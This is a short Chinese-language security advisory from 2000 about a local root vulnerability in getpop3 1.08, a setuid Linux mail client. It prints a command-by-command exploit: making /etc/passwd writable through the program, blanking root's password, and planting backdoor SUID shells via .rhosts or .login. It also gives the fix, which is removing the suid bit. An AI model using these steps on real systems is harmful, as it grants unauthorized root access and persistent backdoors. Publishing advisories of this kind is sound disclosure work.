Linux下的getpop3程序漏洞

（2000-05-31 00:00 ）（不详）（京九网联）

导读-- getpop3是linux下一个pop邮件客户端。该程序默认安装时设置了suid位，而且全局可写。普通用户可以通过该程序的设置漏洞得到root权限.......

漏洞发布时间：2000-03-25漏洞描述:

getpop3是linux下一个pop邮件客户端。该程序默认安装时设置了suid位，而且全局可写。普通用户可以通过该程序的设置漏洞得到root权限。

漏洞检测方法如下：

lamebox:~$ id
uid=1000(elf) gid=100(users) groups=100(users)
lamebox:~$ cp /etc/passwd /tmp/backup
lamebox:~$ getpop3 -V
getpop3 1.08 Copyright 1997 Double Precision, Inc.

lamebox:~$ getpop3 -U /etc/passwd
enter userid: elf
enter password: mypassword
enter host:poopy.reallame666.com
querying poopy.reallame666.com
+OK poopy.reallame666.com POP3 server (Netscape Mail Server v2.02) ready
Fri, 1
$#@62;USER elf
+OK Password required for elf
$#@62;PASS password
+OK elfs mailbox has 0 messages (0 octets)
$#@62;STAT
+OK 0 0
$#@62;QUIT
+OK poopy.reallame666.com POP3 server closing connection

现在/etc/shadow文件已经全局可写了。

lamebox:~$ cat /tmp/backup $#@62; /etc/passwd

下面编写/etc/passwd文件：
root:x:0:0:super admin,,,:/root:/bin/bash 原来样子
root::0:0:your daddy,,,:/root/:bin/bash 更改后
这样登陆以后就会有了root标志#
你也可以编辑.rhosts，root的.login文件等等。让他们登陆以后，自然在/tmp目录下建立一个SUID的shell。这就是后门。

解决方法:

去除该程序的suid位。

责编：

（订阅新闻邮件）（推荐）（打印）（关闭页面）（至顶）（我对此感兴趣）

天极社区邀请您：写博客日记上传相片论坛聊天订阅电子杂志彩信蚂蚁推荐网摘

请您注意：

　遵守国家有关法律、法规，尊重网上道德，承担一切因您的行为而直接或间接引起的法律责任。

　天极网拥有管理笔名和留言的一切权利。